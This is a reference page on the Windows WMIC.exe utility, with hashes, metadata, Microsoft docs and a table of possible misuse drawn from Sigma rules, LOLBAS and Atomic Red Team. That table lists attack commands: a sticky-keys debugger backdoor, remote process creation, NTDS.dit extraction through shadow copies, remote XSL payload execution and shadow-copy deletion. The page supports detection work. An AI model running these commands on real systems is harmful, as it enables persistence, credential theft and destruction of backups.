WMIC.exe

  • File Path: C:\windows\system32\wbem\WMIC.exe
  • Description: WMI Commandline Utility

Hashes

Type Hash
MD5 28C17798ECB0E8D548CEEDEC6CCE2640
SHA1 A897FBC594597BD9FFCAB75FA894F3F78B08136D
SHA256 69FE210903C3F03436FE9F00A493CDB822A64EA17A5729593BBE9EC3E0763C1B
SHA384 AA0D333A62242207DB4FA24DC25EC6B865B290633418E4A58E9E41B7CFD3042E6AE630CEA192399757F868A74F93767C
SHA512 83A40D792D4458B0DF708EA2F5F905D48518DA524B425FDF779B9B10859CCD3688B055A626186C9DFAA3A474C88D11683919459370F459844015A41C6DCB2FC1
SSDEEP 6144:r7QNSrMSNW/oTSijtBqmqRI7R3bYqkFAEsamLywzFD3whscIlGH5enh:r7DrW/oTS8qmWyI1ePFDAhSlGH0nh

Signature

  • Status: The file C:\windows\system32\wbem\WMIC.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: wmic.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of WMIC.exe being misused. While WMIC.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\wmic.exe' DRL 1.0
sigma sysmon_suspicious_dbghelp_dbgcore_load.yml - '\wmic.exe' DRL 1.0
sigma win_mal_blue_mockingbird.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_bypass_squiblytwo.yml - '*\wmic.exe' DRL 1.0
sigma win_crime_maze_ransomware.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_html_help_spawn.yml - '\wmic.exe' DRL 1.0
sigma win_local_system_owner_account_discovery.yml - Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_office_shell.yml - '*\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma win_renamed_binary.yml - 'wmic.exe' DRL 1.0
sigma win_renamed_binary.yml - '\wmic.exe' DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - "wmic.exe" DRL 1.0
sigma win_renamed_binary_highly_relevant.yml - '*\wmic.exe' DRL 1.0
sigma win_shadow_copies_creation.yml - '\wmic.exe' DRL 1.0
sigma win_shadow_copies_deletion.yml - '\wmic.exe' DRL 1.0
sigma win_susp_eventlog_clear.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_susp_wmi_execution.yml - '*\wmic.exe' DRL 1.0
sigma win_xsl_script_processing.yml - Image\|endswith: '\wmic.exe' DRL 1.0
sigma win_xsl_script_processing.yml - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\wmic.exe' DRL 1.0
LOLBAS Wmic.yml Name: Wmic.exe  
LOLBAS Wmic.yml - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"  
LOLBAS Wmic.yml - Command: wmic.exe process call create calc  
LOLBAS Wmic.yml - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"  
LOLBAS Wmic.yml - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"  
LOLBAS Wmic.yml - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"  
LOLBAS Wmic.yml - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"  
LOLBAS Wmic.yml - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"  
LOLBAS Wmic.yml - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"  
LOLBAS Wmic.yml - Path: C:\Windows\System32\wbem\wmic.exe  
LOLBAS Wmic.yml - Path: C:\Windows\SysWOW64\wbem\wmic.exe  
atomic-red-team T1047.md This test uses wmic.exe to execute a process on the local host. MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1220.md | wmic_command | WMI command to execute using wmic.exe | string | process list| MIT License. © 2018 Red Canary
atomic-red-team T1490.md wmic.exe shadowcopy delete MIT License. © 2018 Red Canary
atomic-red-team T1518.001.md wmic.exe /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List MIT License. © 2018 Red Canary

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


wmic

Displays WMI information inside an interactive command shell.

Syntax

wmic </parameter>

Sub-commands

The following sub-commands are available at all times:

Sub-command Description
class Escapes from the default alias mode of WMIC to access classes in the WMI schema directly.
path Escapes from the default alias mode of WMIC to access instances in the WMI schema directly.
context Displays the current values of all global switches.
[quit | exit] Exits the WMIC command shell.

Examples

To display the current values of all global switches, type:

wmic context

Output similar to the following displays:

NAMESPACE    : root\cimv2
ROLE         : root\cli
NODE(S)      : BOBENTERPRISE
IMPLEVEL     : IMPERSONATE
[AUTHORITY   : N/A]
AUTHLEVEL    : PKTPRIVACY
LOCALE       : ms_409
PRIVILEGES   : ENABLE
TRACE        : OFF
RECORD       : N/A
INTERACTIVE  : OFF
FAILFAST     : OFF
OUTPUT       : STDOUT
APPEND       : STDOUT
USER         : N/A
AGGREGATE    : ON

To change the language ID used by the command line to English (locale ID 409), type:

wmic /locale:ms_409

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.